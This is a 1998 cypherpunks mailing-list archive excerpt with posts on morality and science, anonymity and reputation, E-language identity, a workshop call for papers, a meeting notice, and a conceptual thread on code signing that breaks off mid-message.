>doesn't? just to pop a hypothetical example out of the blue,
>say someone named timmy gets arrested for gun violations and
>gets thrown in jail temporarily. would it be immoral for the
>police to remove his organs? perhaps without his permission? 
>perhaps without anesthetic? if not immoral, what? criminal? criminal
>but not immoral?
>
>>While I would not have, I hope, worked in a Nazi death camp, the science
>>obtained is undeniably real science, some of the only solid data we have on
>>freezing humans, on exposing them to pathogens, etc.
>
>I've seen your defense of these experiments before-- its a topic of
>interest for you for obvious reasons; it presents a possible glitch
>in your moral relativism.
>
>I don't think BWs claim that there is a difference between 
>immoral scientists and immoral science. immoral science is what
>immoral scientists practice. what's the point? my personal point
>is that if we had a culture of people who were concerned about
>morality, perhaps we would have institutions that reflect
>integrity. 
>
>contrary to most here, I believe that our institutions
>are correctly representing the people of a country-- their thoughts,
>their motivations, their concerns. its key to the philosophy of
>disenfranchisement, apathy, and nihilism (and anarchism) to 
>claim that the government is not representing the people. what
>is the evidence for this? 
>
>because the government is corrupt,
>the people are not necessarily corrupt? because the government
>is greedy and full of powermongers, the population is not
>full of greedy powermongers who would do the same given the
>opportunity? government is a mirror into our psyches that
>few people care to gaze on, precisely because we are not
>the fairest of them all.
>
>we've got the government we deserve, and it reflects our
>own pathologies within our psyches back to us. it reflects our
>laziness and apathy, our cynicism, our alienation, our 
>withdrawal. and it takes a person who can master themselves 
>to face up to this simple truth-- something that most everone of our 
>country has failed to admit.
>
>when we begin to ask questions like "what is integrity" and
>"what is moral" and come up with serious answers, our world
>will improve. it will degenerate otherwise, and has given us
>a tremendous existence proof of that fact to date.
>
>but just remember, again, that I'm aimlessly ranting here, and there's no
>need to take any of this seriously <g>
>
>
>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 15 Jan 1998 10:51:43 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Covert Superhighway - the missing component? (fwd)
In-Reply-To: <199801150219.UAA03045@einstein.ssz.com>
Message-ID: <199801150301.WAA08649@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199801150219.UAA03045@einstein.ssz.com>, on 01/14/98 
   at 08:18 PM, Jim Choate <ravage@ssz.com> said:

>The problem here is that most gamers are responce-sensitive. They'll
>begin to wonder at some point where all that extra bandwidth is going.

Heh, most of them are Win95 users. They should be well accustomed to
unexplained degradation of performance by now. :)

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: Windows is to OS/2 what Etch-a-Sketch is to art.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNL1q9o9Co1n+aLhhAQFACwP9ExsGGgrivVAJ+TggfrVCxzSL0i2m6iHH
BkOUo5OTTzwGVKxoXi20h+Eympe8jwDGRbl+KJvrkcXq/e4m9nHA9mGvac4pXEzR
SjxU89vR3CA9/0GDhqOHEh5VWa4uHsrnhKxXKtVhHxy7Bq1a8QvynXH6MKoCKyN6
vjc7ctcoqzg=
=oeyT
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 15 Jan 1998 10:15:50 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Bruce Sterling afficianado's...
Message-ID: <199801150244.UAA03187@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



FYI,

Was in the bookstore today and noticed that Bruce Sterling's 'Artificial
Kid' is back in print at $12.95.



    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 15 Jan 1998 12:21:56 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Public choice theory and the politics of antitrust (fwd)
In-Reply-To: <199801150310.VAA03430@einstein.ssz.com>
Message-ID: <199801150432.XAA09418@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199801150310.VAA03430@einstein.ssz.com>, on 01/14/98 
   at 09:10 PM, Jim Choate <ravage@ssz.com> said:

>Forwarded message:

>> Date: Wed, 14 Jan 1998 18:28:50 -0800
>> From: Tim May <tcmay@got.net>
>> Subject: Re: Public choice theory and the politics of antitrust

>> I think, Declan, that deleting the author's name is a Big Problem.

>> You have essentially made this author "Anonymous."

>Does knowing the name of who wrote a piece really have any bearing on the
>consistency of it? Is so then there would be a clear indication that
>there is a fundamental flaw with anonymous remailers and their place in
>society.

Of course there is bearing on who the author is. This is the foundation
behind reputation capital.

The existance of reputation capital does not present any flaws on
anonymous remailers, their documents are just devoid of any such capital
(positive or negative).

Do we really need a rehash of this?

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: Windows?  WINDOWS?!?  Hahahahahehehehehohohoho...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNL2APY9Co1n+aLhhAQETXQQAtSqorI96ZhHcsIRhdB+R2Mw1U4euTBDr
xVnVrb+VRSV+HdkWY2DtQzUV0AAEi2JcxqpqxHbglUH5crs5x3j2/9tGB0NzW45c
m9MhI8BV1RmRYQWzKx4baEvk6+0oj64ViAA44nzs+8RKE8Tkn50n0NusGyQikX+B
SR3OWJT2Pvc=
=0jqV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 15 Jan 1998 10:42:43 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Public choice theory and the politics of antitrust (fwd)
Message-ID: <199801150310.VAA03430@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 14 Jan 1998 18:28:50 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: Public choice theory and the politics of antitrust

> I think, Declan, that deleting the author's name is a Big Problem.

> You have essentially made this author "Anonymous."

Does knowing the name of who wrote a piece really have any bearing on the
consistency of it? Is so then there would be a clear indication that there
is a fundamental flaw with anonymous remailers and their place in society.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Thu, 15 Jan 1998 13:27:29 +0800
To: cypherpunks@ssz.com
Subject: Electric Communities notion of identity
Message-ID: <v03110742b0e34a10b8d4@[207.94.249.133]>
MIME-Version: 1.0
Content-Type: text/plain



Tim may wrote:
>I haven't checked on them in the last few months, but "Electric
>Communities" (www.communities.com) was doing some interesting work on
>adding security and market mechanism extensions to Java, in a superset
>language they called "E."
>
>Many Cypherpunk list members, past and present  worked on aspects of this,
>including Chip Morningstar (one of the founders), Doug Barnes, Norm Hardy,
>Bill Frantz, Mark Miller, etc. They can speak up and say more.

E is a language which supports optimistic distributed programming.  It
produces .class files which run on unmodified Java Virtual Machines.  More
information is available from http://www.communities.com

Perhaps of more interest to cypherpunks is the model of identity
implemented in what is called today EC-Habitats, our graphical "world".
(See the web pages for more details.)

The model is quite similar to the model used by James A. Donald's Crypto
Kong.  Identity is a public key.  You prove who you are by showing that you
hold the private key corresponding to that public key.

All of this key stuff is hidden by the user interface.  What the user sees
is:  You meet someone "in world" and give them a nickname.  When you meet
them again, the software knows that it is the same "person", and refers to
them by your nickname for them.  Thus people can develop and maintain
reputations for each other.


-------------------------------------------------------------------------
Bill Frantz       |                            | Periwinkle -- Consulting
(408)356-8506     | All politicians should ski.| 16345 Englewood Ave.
frantz@netcom.com |                            | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 15 Jan 1998 11:53:19 +0800
To: cypherpunks@cyberpass.net
Subject: CFP: DECEPTION, FRAUD and TRUST in AGENT SOCIETIES Workshop at AA'98
Message-ID: <v04003943b0e3307ffd0e@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


To: e$@vmeng.com
Subject: CFP: DECEPTION, FRAUD and TRUST in AGENT SOCIETIES Workshop at
 AA'98
Mime-Version: 1.0
Date: Wed, 14 Jan 1998 15:30:24 -0500
From: Mary Ellen Zurko <zurko@opengroup.org>
Sender: <e$@vmeng.com>
Precedence: Bulk


            DECEPTION, FRAUD and TRUST in AGENT SOCIETIES


                          Workshop at the
      Second International Conference on Autonomous Agents (AA'98)
                  <http://www.cis.udel.edu/~agents98>


                         FINAL CALL FOR PAPERS

Description of the workshop:

The aim of the workshop is to bring together researchers that can
contribute to a better understanding of trust and deception in agent
societies.
Most agent models assume secure and reliable communication to exist between
agents. However, this ideal situation is seldom met in real life.
Therefore, many techniques (e.g. contracts, signatures, long-term personnel
relationships) have been evolved over time to detect and prevent deception
and fraud in human communication, exchanges and relations, and hence to
assure trust between agents.

In recent research on electronic commerce trust has been recognized as
one of the key factors for successful electronic commerce adoption. In
electronic commerce problems of trust are magnified, because agents
reach out far beyond their familiar trade environments.  Also it is far
from obvious whether existing paper-based techniques for fraud
detection and prevention are adequate to establish trust in an
electronic network environment where you usually never meet your trade
partner physically, and where messages can be read or copied a million
times without leaving any trace. Trust building is more than secure
communication via electronic networks, as can be obtained with, for
example, public key cryptography techniques. For example, the
reliability of information about the status of your trade partner has
very little to do with secure communication. With the growing impact of
electronic commerce distance trust building becomes more and more
important, and better models of trust and deception are needed. One
trend is that in electronic communication channels extra agents, the
so-called Trusted Third Parties, are introduced in an agent community
that take care of trustbuilding among the other agents in the
network. For example, in some cases the successful application of public
key cryptography critically depends on trusted third parties that issue
the keys. Although we do not focus in this workshop on techniques for
secure communication (e.g. public key cryptography), we would welcome
analyses about the advantages and limitations of these techniques for
trustbuilding.

The notion of trust is definitely important in other domains of agents'
theory, beyond that of electronic commerce. It seems even foundational for
the notion of "agency" and for its defining relation of acting "on behalf
of". So, trust is relevant also in HC interaction; consider the relation
between the user and her/his personal assistant (and, in general, her/his
computer).  But it is also critical for modeling groups and teams,
organisations, coordination, negotiation, with the related trade-off
between local/individual utility and global/collective interest;  or in
modelling distributed knowledge and its circulation. In sum, the notion of
trust is crucial for all the major topics of Multi-Agent systems.
Thus what is needed is a general and principled theory of trust, of its
cognitive and affective components, and of its social functions.

Analogously the study of deception not only is very relevant for avoiding
practical troubles, but it seems really foundational for the theory of
communication. First, because it challenges Grice's principles of
linguistic communication; second, because the notion of "sign" itself has
been defined in semiotics in relation to deception: "In principle,
Semiotics is the discipline studying whatever can be used for lying" (U.
Eco).
Thus not only practical defences from deception (like reputations,
guaranties, etc.), but also a general and principled theory of deception
and of its forms (including fraud) are needed.

We would encourage an interdisciplinary focus of the workshop as well as
the presentation of a wide range of models of deception, fraud and
trust(building). Just to mention some examples; AI models, BDI models,
cognitive models, game theory, and also management science theories about
trustbuilding.


Suggested topics include, but are not restricted to:

*  models of deception and of its functions
*  models of trust and of its functions
*  models of fraud
*  role of trust and trusted third parties (TTP) in electronic commerce
*  defensive strategies and mechanisms
*  ways to detect and prevent deception and fraud


WORKSHOP ORGANIZATION

The full-day workshop will be aimed at creating an informal atmosphere for
stimulating discussions, interdisciplinary exchange and deep understanding
of each other's pespective.
We plan to have both:

Paper presentations:
Long presentations (25-30 min) of the accepted papers, plus 10-15 minutes
for discussion (possibly with discussants). Plenary discussion at the end.

Panel sessions:
A couple of topics will be selected for a focused discussion. Some of the
attendees will be requested to participate as panelists. The panels chairs
will circulate prior to the workshop a list of questions for the panelists.

The accepted papers will be published in the workshop proceedings. The
publication of a revised version of the accepted papers is being negotiated
with a high quality publisher.

SUBMISSION: CRITERIA, FORMATS, PROCEDURE

The workshop welcomes submissions of original, high quality papers
addressing issues that are clearly relevant to trust, deception and fraud
in agent-based systems, either from a theoretical or an applied
perspective. Papers will be peer reviewed by at least two referees from a
group of reviewers selected by the workshop organizers.
Submitted papers should be new work that has not been published elsewhere
or is not about to be published elsewhere.

Paper submissions: will include a full paper and a separate title page
with the title, authors (full address), a 300-400 word abstract, and a list
of keywords. The length of submitted papers must not exceed 12 pages
including all figures, tables, and bibliography. All papers must be
written in English.

*       The authors must send by email  the title page of their paper by
January 15th.
*       Submissions must be send electronically, as a postscript or  MSword
format file, by January 20th.
*       The authors must also airmail one hard copy of their paper to two
of the organizers as soon as possible after the electronic submission.
*       No submissions by fax or arriving after the deadline will be accepted.

SUBMISSION ADDRESS

for the electronic submission
Rino Falcone
falcone@pscs2.irmkant.rm.cnr.it
tel. +39 - 6 - 860 90 211

for the airmail hard copy

Babak Sadighi Firozabadi
Department of Computing - Imperial College
180 Queen's Gate - London SW7 2BZ - U.K.

and (notice "and")

Cristiano Castelfranchi
National Research Council - Institute of Psychology
Viale Marx, 15 - 00137 Roma - ITALY
tel +39 6 860 90 518

IMPORTANT DATES

Deadline for the electronic title page          January 15, 1998
Deadline for Paper Submission                   January 20, 1998
Notification of Acceptance/Rejection            March  1, 1998
Deadline for camera-ready version               April  1, 1998
Workshop                                        May 9, 1998



PROGRAM COMMITTEE

Phil Cohen
        Dept. of Computer Science and Engineering, Oregon Inst. of Science
and Tech., USA

Robert Demolombe
        CERT/ONERA, France

Andrew J I Jones
        Dept. of Philosophy - Univ. of Oslo, Norway

Anand Rao
        Australian AI Institute, Melbourne, Australia

Munindar Singh
        Dept. of Computer Science - North Carolina State University, USA

Chris Snijders
        Dept. of Sociology, Utrecht, The Netherlands

Gilad Zlotkin
        VP Engineering, Israel

Gerd Wagner
        Inst.f.Informatik - Univ. Leipzig, Germany

Cristiano  Castelfranchi (co-chair)
        National Research Council - Institute of Psychology- Rome, Italy

Yao-Hua Tan (co-chair)
        EURIDIS - Erasmus University - Rotterdam - The Netherlands

Rino Falcone (co-organizer)
        National Research Council - Institute of Psychology- Rome, Italy

Babak Sadighi Firozabadi (co-organizer)
        Department of Computing - Imperial College - London - UK

==========
Rino Falcone
IP - CNR     National Research Council
Division of "Artificial Intelligence, Cognitive Modeling and Interaction"
Viale Marx, 15  00137 ROMA

email: falcone@pscs2.irmkant.rm.cnr.it   or  falcone@vaxiac.iac.rm.cnr.it
 tel: ++39 6 86090.211 fax: ++39 6 86090.214
==========


 --
See <http://www.cs.umbc.edu/agentslist> for list info & archives.





----------------------------------------------------------------------
Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk/                   info@hyperion.co.uk
----------------------------------------------------------------------
Full-Strength Cryptographic Solutions for Worldwide Electronic Commerce
http://www.c2.net/                                   stronghold@c2.net
----------------------------------------------------------------------
Like e$? Help pay for it!
For e$/e$pam sponsorship or donations, <mailto:rah@shipwright.com>
----------------------------------------------------------------------

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 15 Jan 1998 12:00:11 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Public choice theory and the politics of antitrust
In-Reply-To: <v0300780eb0e309e2c6d8@[168.161.105.216]>
Message-ID: <v03007800b0e334ad308a@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



Tim,

Keep in mind that each post came from a different author, with perhaps one
or two exceptions.

With regard to the names, I know of no formal list policy, law, or custom
that would stop me from forwarding with names attached. However, I thought
it might stifle discourse on a relatively intimate list if folks thought
their posts were blasted around the Net to thousands.

I was my judgment call, and I make no excuses. Take the ideas for what
they're worth.

-Declan

At 18:28 -0800 1/14/98, Tim May wrote:
>At 4:34 PM -0800 1/14/98, Declan McCullagh wrote:
>>I wrote a little about public choice theory and the politics of antitrust
>>in my article last week:
>>
>>  http://cgi.pathfinder.com/netly/opinion/0,1042,1678,00.html
>>
>>Attached are excerpts from recent posts to a law and economics mailing list
>>I'm on. I'm unsure of the reposting policy, so I'm deleting authors' names.
>>Should be good reading anyway.
>
>I think, Declan, that deleting the author's name is a Big Problem. I
>inititally assumed you wrote these words, and was preparing a rebuttal
>(esp. to the fanciful " Intel's Portland facility has 800 programmers
>charged with coming up with something as cool as the operating system
>developed by Next. Stay tuned." piece of nonsense.
>
>But then I went back and read your "deleting author's names" line, so now I
>have no idea who I'm rebutting.
>
>You have essentially made this author "Anonymous."
>
>A better approach is to ask his permission, for something substantive like
>this piece is, and then either post his words with his name, or not post it.
>
>--Tim May
>
>
>The Feds have shown their hand: they want a ban on domestic cryptography
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^2,976,221   | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: phelix@vallnet.com
Date: Thu, 15 Jan 1998 11:21:17 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Talk of Banning Research into Human Cloning (fwd)
In-Reply-To: <199801141503.JAA00917@einstein.ssz.com>
Message-ID: <34bd581d.12139978@128.2.84.191>
MIME-Version: 1.0
Content-Type: text/plain



On 14 Jan 1998 15:16:55 -0600, Jim Choate <ravage@ssz.com> wrote:


>Actualy, at least according to one episode of that show on TDC that Skully
>form the X-Files hosts, there are several groups who are working on just
>this thing. One female researcher has extended the life of worms (admittedly
>a step or two from humans) by 7 times with no apparent effect. There was a
>piece on CNN late last nite about some researchers discussing this as well.
>Their estimate is that it would be at least 5 years before there would be
>anything available on the open market.
>
>There is also at least two groups working on growing specific organs. One
>group (the one interviewed on the TDC show) is using plastic forms to grow
>the organs in. They can apparently grow small samples of specific cells and
>are looking at how to organize the growth of more complex structures such as
>a kidney which would include blood-vessels and such.
>
>I am sorry I don't know the name of the show. If somebody out there does
>please speak up.
>

The name of the show is "Future Fantastic".  There were 4 episodes, each
covering a different area.

-- Phelix





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 15 Jan 1998 14:35:10 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: rant on the morality of confidentiality (fwd)
Message-ID: <199801150703.BAA04343@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Note that any errors in transcription are mine, I had to re-edit this to
get it to fit on a 80 column screen.

Forwarded message:

> From: Wayne Radinsky <waynerad@oz.net>
> Subject: RE: rant on the morality of confidentiality 
> Date: Wed, 14 Jan 1998 20:32:15 -0800

> The reason morality is impossible to nail down is because it does not exist
> al all in any absolute sense,

Morality is an individuals or societal groups beliefs of right and wrong.
Of course there is no more absolute right morality than there is a right
flavor of ice cream, this entire line of reasoning is a non sequitar. Ethics
is the issues of what is correct or permissible in relation to a particular
human activity such as scientific research or law.

When you use 'science' and 'morality' in a comparison you are in actuality
comparing apples and oranges. Science is related to *how* one does a
particular activity, it is not concerned in the least with *why* that
activity should (not) be done in the first place.

Science and its philosophy are *not* applicable to all areas of human
discourse anymore than the Bible is applicable as a methodology to study
quantum physics or aerodynamics.

> at least as far as science is concerned.

Science isn't concerned with right, wrong, morality, etc. It *is*
concerned with a systematic way to ask questions in a *specific* area of
discourse. To apply science to religion is as much a disservice to science
and religion as it would be to try to apply it to art.

> According to the principle of natural selection, all people, including
> scientists, exist purely to maximize their own inclusive genetic fitness.

Exactly whose theory or principle of natural selection? At the current time
I am aware of several different theories that fit the data but which in many
aspects are mutualy exclusive. This is entirely too broad a statement to
have reasonable merit. We simply don't know enough about what is going on
with the processes of life to justify this sort of leap.

> Keep in mind that all natural selection really does is decide which genes
> are allowed to propagate,

Natural selection isn't doing anything. It is a term we apply to a process
we observe occurring. That process seems to occur at several levels besides
just the genes.

> and since genes are just digital information stored on DNA molecules

I'm afraid it's a bit more complicated than that. We start with the base
pairs, which really are informationaly isolated from the codons which are
triplets of base pairs which form a 'word' in the genetic code. It is of
some import to realize that the genetic code itself is *not* dependant on
the actual mechanism of expression, in other words you can talk about
the genetic langauge without any reference to the base pairs themselves.
It is the codons that are important. There is a fundamental symmetry break
at that level. Each of the codons is mapped to one of 20 amino acids. Since
there are 4 bases arranged in 3's there are 64 combinations. This means
that for any particular amino acid there is more than one way to code
it. There are also several 'stop' codes which break the transcription
process as well.

>, what we call "life" is really just a complex
> interaction of matter/energy which determines which bits of information
> continue to exist over time.

That works equaly well as a definition of the cosmos. Keep this up and
you'll become a pantheist...;)

> The underlying reason people benefit by promoting themselves as moral
> people, in general, is because of the benefit of what evolutionary
> psychologists call reciprocal altruism.  With reciprocal altruism, both
> parties benefit if they are in a non-zero-sum situation.  Because most
> situations are non-zero-sum and the benefits are so great, everyone has
> a stake in promoting themselves as a good reciprocal altruist, in other
> words, a good, trustworthy, moral person.  This is how natural selection
> explains the existence of the concept of "morality".

Oh boy...

Not all moralities or religions accept the premise of altruistic behaviour.
Further, if you look at the prisoners game, you actualy accrue more from
intermittent moral behaviour than from consistent moral behaviour. Human
morality has no place in any consistent theory of natural selection that
I have ever seen. Please explain how a moral theory as you propose will
increase the participants likelyhood for reproduction? Further, if you look
at primate research (both non-human and human) what you find is a tendency
for promiscuity in both sexes. Males tend to be 'in heat' at all times while
females (at least when they are just entering the mating group) tend to
follow a estrus or lunar based cycle. Recent studies of primates in Africa
have found that the previous theory that band members don't intermingle is
actualy incorrect. Upon extended monitoring they find that when the females
go into heat each month they sneak off and mate with outlying members of
other bands (who are usualy un-paired males). They intentionaly hide this
activity from their band mates because if caught they will face a physical
assault and potentialy death. This raises the question of whether chimps
have morality under your view because it is clearly a measure of right and
wrong. Are you willing to give chimps some sort of equal status to humans
as a result? Studies of human females find this same sort of behaviour in
the young just entering the mating pool. Studies find that young women tend
to wear more provocative clothing and explore non-familiar peer groups in
relation to their menstrual cycle.

> So it is a myth that scientists live to find deep truths or to benefit
> humanity.

Absolutely, unfortunately the fallicy with such an assertion have nothing
to do with the reasons you expound.

> They may do those things, but their real goal is maximizing their own
> inclusive fitness.

So being a scientist increases ones probability for mating? Please be so
kind as to offer some proof. Do scientist tend to have more offspring than
non-scientist? I think you will find that the actual studies show that the
more intelligent and well educated tend to have *fewer* children. This would
seem to run contrary to your hypothesis.



    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 15 Jan 1998 17:45:39 +0800
To: cryptography@c2.net
Subject: BAY AREA CYPHERPUNKS MEETING, SATURDAY 1/17, OAKLAND
Message-ID: <3.0.5.32.19980115013711.008bb9f0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



The January Bay Area Cypherpunks Meeting will be Saturday afternoon
at C2 Software's office in Oakland.

Agenda:   Export Laws - Lee Tien and Greg Broiles
	   Work in Progress
	   Lots of discussion from RSA Conference.

Time:     12-6pm followed by dinner - program starts at 1:00
Location: C2Net Software, Inc. 1440 Broadway Suite 700, Oakland, CA
          Phone: (510) 986-8770  Fax: (510) 986-8777 
Public Transportation - about two blocks from the 12th St BART station.
	   This is the best way to get there from San Francisco,
	   and parking for BART trains is easy.  :-)
Driving - From South - take 880N to Broadway exit, about .9 mile, park
          From San Francisco - Take the Bay Bridge to Grand Ave,
		turn right on Telegraph and continue on Broadway.
	
Map URL:  http://www.mapblast.com/yt.hm?FAM=mapblast&CMD=GEO&SEC=find&IC=0%3A0%3A5&IC%3A=C2+Suite+700&AD2=1440+Broadway&AD3=Oakland%2C+CA



				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Thu, 15 Jan 1998 14:44:16 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: how to release code if the programmer is a target for coercion (fwd)
Message-ID: <tw71zyap7cy.fsf@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



> man in the middle attack on people signing code

How would you do this?  There is code.  You sign that code with your personal
pgp key, which you are assumed to keep secure.  Cases:

A) The code is authentic, but backdoored: you will look at it when verifying
it and refuse to sign it, optionally posting how it is flawed to the world.

B) The code is not the actual code used in the product, but unbackdoored:
In this case, you sign it, but when someone tries to compile, the real
code is not signed, and thus the attacker is no better off.

C) The code is not the actual code used in the product, and is backdoored:
The NSA is really stupid, then.

D) The code is the authentic code, and is unbackdoored: you win.

The only attacks would be if you could sneak a bug by the verifiers.  With
modern execution environments, it is *possible* there could be unintended
consequences to almost anything.  That's why I think one of the first
pieces of code verified should be the JVM.

Another attack would be having 5 NSA agents sign a piece of code, but 
you could prevent that by having the list made up of distinct well known
individuals who are unlikely to all be bought -- if the NSA wants to
give $100m each to the most frequent 100 posters on cypherpunks, I want
to get in line :)


-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "wabe" <wabe@smart.net>
Date: Thu, 15 Jan 1998 15:41:33 +0800
To: <cypherpunks@ssz.com>
Subject: No Subject
Message-ID: <003701bd21a0$acd58400$cf8588d1@justice>
MIME-Version: 1.0
Content-Type: text/plain



I like Crypto Kong.  Easy to use, and cool name and
little rose insignia.

Private Idaho, on the other hand, was a pain
and eventually I gave up. (I tried to install and
use the 32 bit version.)

-wabe
    --digsig
         
     EojdyErVslc/s6aQeIHwnOlMw3lUKJhdZc/ZeCNfe7H
     bPOgfo2WuJqphHEKAhe/nQIPFt1T6nTh8Ry5v9lp
     47roQ27BeTu2jFYXmJJoIWdG9Lvnx+zmSiHoqscae







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 15 Jan 1998 16:09:53 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: how to release code if the programmer is a target for coercion (fwd)
Message-ID: <199801150835.CAA04627@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Sorry Ryan,

I'll need more context to answer this one. Would it be too much to ask for
more than a fragment of one sentence...:(

Forwarded message:

> Subject: Re: how to release code if the programmer is a target for coercion (fwd)
> From: Ryan Lackey <rdl@mit.edu>
> Date: 15 Jan 1998 01:41:01 -0500

> > man in the middle attack on people signing code
> 
> How would you do this?  There is code.  You sign that code with your personal
> pgp key, which you are assumed to keep secure.  Cases:

I've probably sent out somewhere in the neighborhood of 40+ messages in the
last two days, several have related to signing documents in different
contexts. I don't recognize this particular fragment. Sorry, I don't
memorize my traffic nor do I keep archives of it and I'm way to lazy to
go searching the cypherpunks archives at 2am.

I'm assuming this has something to do with the eternity server/black_net
discussion that has been going on. So I'll take a stab at it, not that it
may make any sense in the actual context ...

 - You generate the code and sign it

 - You deliver the signed code to a data haven server of some architecture
   (note that you don't know where it is or who runs it, I'll assume you
    use some particular usenet newsgroup as your drop point)

 - Somebody else comes along and sees a list of available items and selects
   yours (again through a usenet based request mechanism).

 - They receive the code signed with 'your' key and decide they want to
   verify the signing (through yet another usenet channel).

The problem with this model is in the second step. What is to keep them
from removing your signatory, moding the code, and then resigning it. If the
